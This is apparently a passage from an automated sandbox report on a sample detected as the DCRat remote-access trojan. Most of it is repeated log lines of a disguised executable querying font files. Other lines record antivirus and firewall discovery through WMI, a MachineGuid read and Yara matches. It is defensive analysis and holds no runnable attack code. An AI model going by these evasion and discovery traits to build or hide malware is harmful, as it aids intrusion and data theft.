                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0091DF1E
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090B146 GetVersionExW,0_2_0090B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: serverBrokerperfMonitor.exe PID: 7580, type: MEMORYSTR
